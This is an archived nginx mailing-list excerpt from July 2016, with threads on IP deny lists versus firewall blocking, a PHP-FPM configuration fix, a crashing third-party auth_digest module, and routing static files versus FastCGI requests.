On Sat, 30 Jul 2016 23:49:30 +0300 "Valentin V. Bartenev" wrote:

> On Saturday 30 July 2016 10:52:46 lists at lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300 "Valentin V. Bartenev" wrote:
> > > On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote:
> > > > I see a fair amount of hacking attempts in the access.log. That
> > > > is, they show up with a return code of 400 (malformed). Well
> > > > yeah, they are certainly malformed. But when I add the offending
> > > > IP address to my blocked list, they still show up as malformed
> > > > upon subsequent readings of access.log. That is, it appears to
> > > > me that nginx isn't checking the blocked list first.
> > > >
> > > > If true, shouldn't the blocked IPs take precedence?
> > > >
> > > > Nginx 1.10.1 on FreeBSD 10.2
> > >
> > > It's unclear what you mean by "my blocked list". But if you're
> > > speaking about "ngx_http_access_module" then the answer is no, it
> > > shouldn't take precedence. It works on a location basis, which
> > > implies that the request has been parsed already.
> > >
> > > wbr, Valentin V. Bartenev
> > >
> > > _______________________________________________
> >
> > My "blocked IPs" are implemented as follows.
> > In nginx.conf:
> > ------------------
> > http {
> > include mime.types;
> > include /usr/local/etc/nginx/blockips.conf;
> > -------------------------------------
> >
> > The format of the blockips.conf file:
> > ------------------
> > #haliburton
> > deny 34.183.197.69 ;
> > #cloudflare
> > deny 103.21.244.0/22 ;
> > deny 103.22.200.0/22 ;
> > deny 103.31.4.0/22 ;
> > -------------------------------
>
> The "deny" directive comes from ngx_http_access_module.
> See the documentation:
> http://nginx.org/en/docs/http/ngx_http_access_module.html
>
> > Running "make config" in the nginx ports, I don't see
> > "ngx_http_access_module" as an option, nor anything similar.
>
> [..]
>
> It's a standard module, which is usually built by default.
>
> > So given this set up, should the IP space in blockedips.conf take
> > precedence?
>
> No.
>
> > My thinking is this. If a certain IP (or more generally the entire
> > IP space of the entity) is known to be attempting hacks, why bother
> > to process the http request? I know I could block them in the
> > firewall, but blocking in the web server makes more sense to me.
>
> Why bother to accept such connection at all? There's no sense
> to accept a connection in nginx and then discard it immediately.
>
> In your case it should be blocked on the system level.
>
> wbr, Valentin V. Bartenev
>
> _______________________________________________

I can do the blocking in the firewall, but I could see a scenario where a web hosting provider would want to do web blocking on a per-domain basis. That is, what one customer wants to be blocked will not be what all customers want blocked. So it seems to me that if the IP could be checked first within nginx, there is value in that.

In my case, I only want to block web access, which I assume I can do via the firewall. My point being that the web server has a significantly larger attack surface than email.
So while I would want to block access to my nginx server, I would allow email access from the same "blocked" IP. After all, the user I blocked might want to email the webmaster to inquire why they are blocked. Or there are multiple domains at the same IP, and not everyone is a hacker.

Eyeballs generally come from ISPs and schools. Datacenters are not eyeballs. Yeah, people surf from work, but if you block some corporate server that has been attempting to hack your server, so be it. Email, on the other hand, DOES come from datacenters, so they shouldn't be blocked on port 25.

From nginx-forum at forum.nginx.org Sun Jul 31 06:09:13 2016
From: nginx-forum at forum.nginx.org (itpp2012)
Date: Sun, 31 Jul 2016 02:09:13 -0400
Subject: Hierarchy of malformed requests and blocked IPs
In-Reply-To: <20160730181504.7ea3661a@linux-h57q.site>
References: <20160730181504.7ea3661a@linux-h57q.site>
Message-ID:

See https://forum.nginx.org/read.php?2,267651

At this level nginx is not an advanced all-layer firewall/IDS/DDoS tool.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268629,268646#msg-268646

From mailinglisten at simonhoenscheid.de Sun Jul 31 07:07:27 2016
From: mailinglisten at simonhoenscheid.de (=?UTF-8?Q?Simon_H=c3=b6nscheid?=)
Date: Sun, 31 Jul 2016 09:07:27 +0200
Subject: [FIXED] PHP-FPM Integration driving me mad
In-Reply-To: <1469915038.659917.681402849.793AD758@webmail.messagingengine.com>
References: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> <1469915038.659917.681402849.793AD758@webmail.messagingengine.com>
Message-ID:

Hey Edho,

Thanks a lot! Fixed!
Kind Regards
Simon

On 30.07.16 at 23:43, Edho Arief wrote:
> Hi,
>
> On Sun, Jul 31, 2016, at 05:44, Simon Hönscheid wrote:
>> server {
>>     server_name www.example.com;
>>     listen xxx.xxx.xxx.xx:443 ssl http2;
>>     access_log /var/log/nginx/www.example.com-access.log combined;
>>     error_log /var/log/nginx/www.example.com-error.log notice;
>>     ssl_protocols TLSv1.2 TLSv1.1 TLSv1;
>>     ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL;
>>     charset utf-8;
>>     index index.php index.html;
>>     client_max_body_size 50M;
>>     ssl_prefer_server_ciphers on;
>>     ssl_session_cache shared:SSL:5m;
>>     ssl_dhparam /etc/nginx/dhparam.pem;
>>     ssl_certificate /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem;
>>     ssl_certificate_key /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem;
>>
>>     location ~ /\. {
>>         deny all;
>>         access_log off;
>>         log_not_found off;
>>     }
>>     location / {
>>         try_files $uri $uri/ /index.php?q=$uri&$args;
>>         root /var/www/www.example.com;
>>     }
>>     location ~ \.php$ {
>>         fastcgi_buffers 16 4k;
>>         fastcgi_index index.php;
>>         fastcgi_pass unix:/var/run/fpmpool-www.socket;
>>         include fastcgi_params;
>>     }
>> }
>>
> I think you're missing a `root` directive, either at the server level or in php's location block, and `SCRIPT_FILENAME` in php's location block.
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

From mdounin at mdounin.ru Sun Jul 31 22:53:43 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Mon, 1 Aug 2016 01:53:43 +0300
Subject: Auth_digest not working
In-Reply-To: <01c22c88-23f9-d38d-5ce2-0bdcb6c89f3d@fechner.net>
References: <01c22c88-23f9-d38d-5ce2-0bdcb6c89f3d@fechner.net>
Message-ID: <20160731225343.GC57459@mdounin.ru>

Hello!

On Sat, Jul 30, 2016 at 06:03:47PM +0200, Matthias Fechner wrote:

> I have a very simple webserver running with php-fpm connected (to handle
> php scripts).
> It is running perfectly fine without authentication (on a FreeBSD
> installation).
>
> If I enable auth_digest (which is enabled in the FreeBSD port I
> compiled), I see only in the main error log the line:
> 2016/07/30 17:55:54 [alert] 7280#102036: worker process 7318 exited on
> signal 11

The auth_digest module is a 3rd-party one. And the message suggests
there is a bug in it, or it's not compatible with the current
version of nginx.

You may consider using an official module instead, auth_basic.
See here for details:
http://nginx.org/en/docs/http/ngx_http_auth_basic_module.html

--
Maxim Dounin
http://nginx.org/

From denis.papathanasiou at gmail.com Sun Jul 31 22:55:54 2016
From: denis.papathanasiou at gmail.com (Denis Papathanasiou)
Date: Sun, 31 Jul 2016 18:55:54 -0400
Subject: Configuring nginx for both static pages and fcgi simultaneously
Message-ID:

I have the following configuration file defined in
/etc/nginx/conf.d/my-project.conf (this is on debian).

It does what I want, in that it serves static content in the /css,
/images, /js folders along with index.html correctly.

And for dynamic requests (I'm running an fcgi-enabled server on port
9001) to /contact, /login, and /signup it also works correctly.

I would just like to be able to declare that anything *except*
index.html, /css, /images, and /js should all go to the fcgi server.

I've experimented with various definitions of "location", but the only
one that seems to work is the one I have below, where all the possible
fcgi paths are defined explicitly.

Is there a better, simpler way of doing this?
server {
    listen 80;
    listen [::]:80 default_server ipv6only=on; ## listen for ipv6
    server_name localhost;
    root /var/www/my-project/html;

    location / {
        index index.html;
    }
    location /images/ {
        root /var/www/my-project/html;
    }
    location /css/ {
        root /var/www/my-project/html;
    }
    location /js/ {
        root /var/www/my-project/html;
    }
    location ~ ^/(contact|login|signup)$ {
        include /etc/nginx/fastcgi_params;
        fastcgi_pass 127.0.0.1:9001;
    }
}

From mdounin at mdounin.ru Sun Jul 31 23:15:29 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Mon, 1 Aug 2016 02:15:29 +0300
Subject: Configuring nginx for both static pages and fcgi simultaneously
In-Reply-To:
References:
Message-ID: <20160731231529.GD57459@mdounin.ru>

Hello!

On Sun, Jul 31, 2016 at 06:55:54PM -0400, Denis Papathanasiou wrote:

> I have the following configuration file defined in
> /etc/nginx/conf.d/my-project.conf (this is on debian).
>
> It does what I want, in that it serves static content in the /css, /images,
> /js folders along with index.html correctly.
>
> And for dynamic requests (I'm running an fcgi-enabled server on port 9001)
> to /contact, /login, and /signup it also works correctly.
>
> I would just like to be able to declare that anything *except* index.html,
> /css, /images, and /js should all go to the fcgi server.
>
> I've experimented with various definitions of "location", but the only
> one that seems to work is the one I have below, where all the possible
> fcgi paths are defined explicitly.
>
> Is there a better, simpler way of doing this?

So, you need to pass to fastcgi anything except /, /index.html,
and anything starting with /css/, /images/, and /js/, right?

The simplest solution would be exactly that: define a catch-all
"location /" to pass anything to fastcgi, and explicitly exclude
the required paths using additional locations:

root /var/www/my-project/html;
index index.html;

location / {
    fastcgi_pass ...
include fastcgi_params; } location = / {} location = /index.html {} location /css/ {} location /images/ {} location /js/ {} -- Maxim Dounin http://nginx.org/ From r1ch+nginx at teamliquid.net Sun Jul 31 23:38:29 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Mon, 1 Aug 2016 01:38:29 +0200 Subject: Configuring nginx for both static pages and fcgi simultaneously In-Reply-To: <20160731231529.GD57459@mdounin.ru> References: <20160731231529.GD57459@mdounin.ru> Message-ID: Are you sure you don't want to use try_files for this? http://nginx.org/en/docs/http/ngx_http_core_module.html#try_files On Mon, Aug 1, 2016 at 1:15 AM, Maxim Dounin wrote: > Hello! > > On Sun, Jul 31, 2016 at 06:55:54PM -0400, Denis Papathanasiou wrote: > > > I have the following configuration file defined in > > /etc/nginx/conf.d/my-project.conf (this is on debian). > > > > It does what I want, in that it serves static contet in the /css, > /images, > > /js folders along with index.html correctly. > > > > And for dynamic requests (I'm running an fcgi-enabled server on port > 9001) > > to /contact, /login, and /singup it also works correctly. > > > > I would just like to be able to declare that anything *except* > index.html, > > /css, /images, and /js, it should all go to the fcgi server. > > > > I've experimented with various definitions of "location", but the only > > one that seems to work is the one I have below, where all the possible > > fcgi paths are defined explicitly. > > > > Is there a better, simpler way of doing this? > > So, you need to pass to fastcgi anything except /, /index.html, > and anything starting with /css/, /images/, and /js/, right? > > Most simple solution would be exactly this, by defining a catch-all > "location /" to pass anything to fastcgi, and explicitly excluding > required paths using additional locations: > > root /var/www/my-project/html; > index index.html; > > location / { > fastcgi_pass ... 
> include fastcgi_params; > } > > location = / {} > location = /index.html {} > location /css/ {} > location /images/ {} > location /js/ {} > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Sun Jul 31 23:50:44 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Aug 2016 02:50:44 +0300 Subject: Configuring nginx for both static pages and fcgi simultaneously In-Reply-To: References: <20160731231529.GD57459@mdounin.ru> Message-ID: <20160731235044.GF57459@mdounin.ru> Hello! On Mon, Aug 01, 2016 at 01:38:29AM +0200, Richard Stanway wrote: > Are you sure you don't want to use try_files for this? If a required handling is known in advance there is no need to use try_files and waste resources on it. -- Maxim Dounin http://nginx.org/